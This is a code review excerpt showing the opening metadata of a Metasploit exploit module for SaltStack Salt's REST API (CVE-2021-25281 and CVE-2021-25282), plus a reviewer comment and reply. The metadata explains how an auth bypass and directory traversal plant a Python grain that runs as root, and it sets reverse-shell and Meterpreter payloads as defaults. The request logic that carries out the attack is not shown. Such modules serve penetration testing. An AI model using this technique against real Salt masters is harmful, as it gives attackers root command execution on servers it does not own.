modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb

```diff
@@ -0,0 +1,259 @@
+          traversal vulnerabilities in Saltstack Salt's REST API to execute
+          commands remotely on the `master` as the root user.
+
+          Every 60 seconds, `salt-master` service performs a maintenance
+          process check that reloads and executes all the `grains` on the
+          `master`, including custom grain modules in the Extension Module
+          directory. So, this modules simply creates a Python script at this
+          location and wait for being executed. The time interval is set to 60
+          seconds by default but can be changed in the `master` configuration
+          file with the `loop_interval` option. Note that, if an administrator
+          executes commands locally on the `master`, the maintenance process
+          check will also be performed.
+
+          It has been fixed in the following installation packages: 3002.5,
+          3001.6 and 3000.8
+
+          Also, a patch is available for the following versions: 3002.2,
+          3001.4, 3000.6, 2019.2.8, 2019.2.5, 2018.3.5, 2017.7.8, 2016.11.10,
+          2016.11.6, 2016.11.5, 2016.11.3, 2016.3.8, 2016.3.6, 2016.3.4,
+          2015.8.13 and 2015.8.10
+
+          This module has been tested successfully against versions 3001.4,
+          3002 and 3002.2 on Ubuntu 18.04
+        },
+        'Author' => [
+          'Alex Seymour',           # Original PoC
+          'Christophe De La Fuente' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2021-25281'], # Auth bypass
+          ['CVE', '2021-25282'], # Directory traversal
+          ['URL', 'https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/'],
+          ['URL', 'https://github.com/Immersive-Labs-Sec/CVE-2021-25281/blob/main/cve-2021-25281.py']
+        ],
+        'DisclosureDate' => '2021-02-25',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'WfsDelay' => 90, # The master's maintenance process check cycle is set to 60 sec. by default
+          'SSL' => true     # Salt API uses HTTPS by default
+        },
+        'Notes' => {
```

Comment:
It is nice to have `Stability` trait(s).

Reply:
Added in fca8bf3. Thanks for the heads up!